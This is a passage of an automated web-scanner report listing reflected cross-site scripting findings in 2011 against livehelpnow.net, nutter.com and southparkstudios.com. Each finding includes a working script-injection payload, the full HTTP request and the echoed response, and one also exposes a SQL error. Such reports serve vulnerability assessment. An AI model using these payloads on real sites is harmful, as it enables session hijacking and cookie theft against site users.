The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c52a%3balert(1)//90d60205d5c was submitted in the lhnid parameter. This input was echoed as 8c52a;alert(1)//90d60205d5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=12888c52a%3balert(1)//90d60205d5c&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 19 Apr 2011 20:12:32 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9873


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
ion.protocol=='https:' || (typeof lhnJsHost !='undefined' && lhnJsHost == "https://"))
   {
       window.open('https://www.livehelpnow.net/lhn/livechatvisitor.aspx?zzwindow=' + lhnwindow + '&lhnid=' + 12888c52a;alert(1)//90d60205d5c + '&d=' + 0,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=' + sScrollbars + ',copyhistory=no,resizable=yes'
...[SNIP]...

3.170. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60bf4"%3balert(1)//82a7cbbe680 was submitted in the lhnid parameter. This input was echoed as 60bf4";alert(1)//82a7cbbe680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=128860bf4"%3balert(1)//82a7cbbe680&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 19 Apr 2011 20:12:32 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9883


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=173.193.214.243|128860bf4";alert(1)//82a7cbbe680|4/19/2011 4:12:32 PM' />
...[SNIP]...

3.171. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23e8b'%3balert(1)//cf95cc40312 was submitted in the t parameter. This input was echoed as 23e8b';alert(1)//cf95cc40312 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f23e8b'%3balert(1)//cf95cc40312 HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 19 Apr 2011 20:12:37 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9632


var lhnTrack='f23e8b';alert(1)//cf95cc40312';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=-1;
InviteRepeats=0;

function pausecomp(millis)
...[SNIP]...

3.172. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8f07c%3balert(1)//96a0de8e20 was submitted in the zimg parameter. This input was echoed as 8f07c;alert(1)//96a0de8e20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=598f07c%3balert(1)//96a0de8e20&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 19 Apr 2011 20:12:31 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9708


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=-1;
InviteRepeats=0;

function p
...[SNIP]...
mageserver.ashx?lhnid=" + 1288 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 598f07c;alert(1)//96a0de8e20 + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=&rndstr=" + lhnrand_no + "'>
...[SNIP]...

3.173. http://www.nutter.com/attorneys.php [AttorneyID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The value of the AttorneyID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b151a"><script>alert(1)</script>bae38c8c76f was submitted in the AttorneyID parameter. This input was echoed as b151a\"><script>alert(1)</script>bae38c8c76f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorneys.php?AttorneyID=79b151a"><script>alert(1)</script>bae38c8c76f HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php?letter=K
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:19:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 12045

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on
...[SNIP]...
<a href="vcard.php?AttorneyID=79b151a\"><script>alert(1)</script>bae38c8c76f" title="V-Card" id="vCard">
...[SNIP]...

3.174. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 9abcc<a>6b16b1680ee was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careers.php?CategoryID=239abcc<a>6b16b1680ee HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:29:21 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 959

<!-- careers start -->

error: Unknown column '239abcc' in 'where clause' | 1054<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=239abcc<a>6b16b1680ee
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
...[SNIP]...

3.175. http://www.southparkstudios.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e731a"><script>alert(1)</script>9dbbd360ab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e731a"><script>alert(1)</script>9dbbd360ab1=1 HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 26686
Content-Type: text/html;charset=utf-8
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 02:01:55 GMT; path=/
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 02:01:55 GMT; path=/
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 02:01:55 GMT; path=/
X-Powered-By: PHP/5.3.2
Vary: User-Agent
Expires: Tue, 19 Apr 2011 20:01:55 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/?e731a"><script>alert(1)</script>9dbbd360ab1=1&cmsPageId=351143" type="text/javascript">
...[SNIP]...

3.176. http://www.southparkstudios.com//feeds/twitter_search/query/cart.mn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   //feeds/twitter_search/query/cart.mn/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66255"><script>alert(1)</script>8d642b71193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET //feeds66255"><script>alert(1)</script>8d642b71193/twitter_search/query/cart.mn/ HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242724|session#1303242631302-17636#1303244524; s_nr=1303242663276; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9208
Expires: Tue, 19 Apr 2011 20:04:52 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:04:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/feeds66255"><script>alert(1)</script>8d642b71193/twitter_search/query/cart.mn/&cmsPageId=" type="text/javascript">
...[SNIP]...

3.177. http://www.southparkstudios.com//feeds/twitter_search/query/cart.mn/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   //feeds/twitter_search/query/cart.mn/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582b6"><script>alert(1)</script>0bf5c8d2bb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET //feeds/twitter_search582b6"><script>alert(1)</script>0bf5c8d2bb0/query/cart.mn/ HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242724|session#1303242631302-17636#1303244524; s_nr=1303242663276; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9214
Expires: Tue, 19 Apr 2011 20:04:52 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:04:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/feeds/twitter_search582b6"><script>alert(1)</script>0bf5c8d2bb0/query/cart.mn/&cmsPageId=" type="text/javascript">
...[SNIP]...

3.178. http://www.southparkstudios.com/account/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 480f0"><script>alert(1)</script>6f8e9ffc984 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account480f0"><script>alert(1)</script>6f8e9ffc984/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9274
Expires: Tue, 19 Apr 2011 20:05:33 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:05:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/account480f0"><script>alert(1)</script>6f8e9ffc984/login&cmsPageId=" type="text/javascript">
...[SNIP]...

3.179. http://www.southparkstudios.com/account/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb000"><script>alert(1)</script>49a8f150b11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account/logineb000"><script>alert(1)</script>49a8f150b11 HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9204
Expires: Tue, 19 Apr 2011 20:05:33 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:05:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/account/logineb000"><script>alert(1)</script>49a8f150b11&cmsPageId=" type="text/javascript">
...[SNIP]...

3.180. http://www.southparkstudios.com/account/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc6b"><script>alert(1)</script>4d6c7d9ba48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account/login?6fc6b"><script>alert(1)</script>4d6c7d9ba48=1 HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10716
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 20:05:32 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 20:05:32 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=0e80e806dbb6355fe9818076042cf97f; expires=Wed, 18-Apr-2012 20:05:32 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 20:05:32 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 20:05:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:05:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/account/login?6fc6b"><script>alert(1)</script>4d6c7d9ba48=1&cmsPageId=" type="text/javascript">
...[SNIP]...

3.181. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15540"><script>alert(1)</script>f37e55f8e40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clips15540"><script>alert(1)</script>f37e55f8e40/360434/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9219
Expires: Tue, 19 Apr 2011 19:46:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:46:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/clips15540"><script>alert(1)</script>f37e55f8e40/360434/god-bless-you-captain-hindsight&cmsPageId=" type="text/javascript">
...[SNIP]...

3.182. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f9a"><script>alert(1)</script>3282301e834 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clips/36043422f9a"><script>alert(1)</script>3282301e834/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9287
Expires: Tue, 19 Apr 2011 19:47:20 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:47:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/clips/36043422f9a"><script>alert(1)</script>3282301e834/god-bless-you-captain-hindsight&cmsPageId=" type="text/javascript">
...[SNIP]...

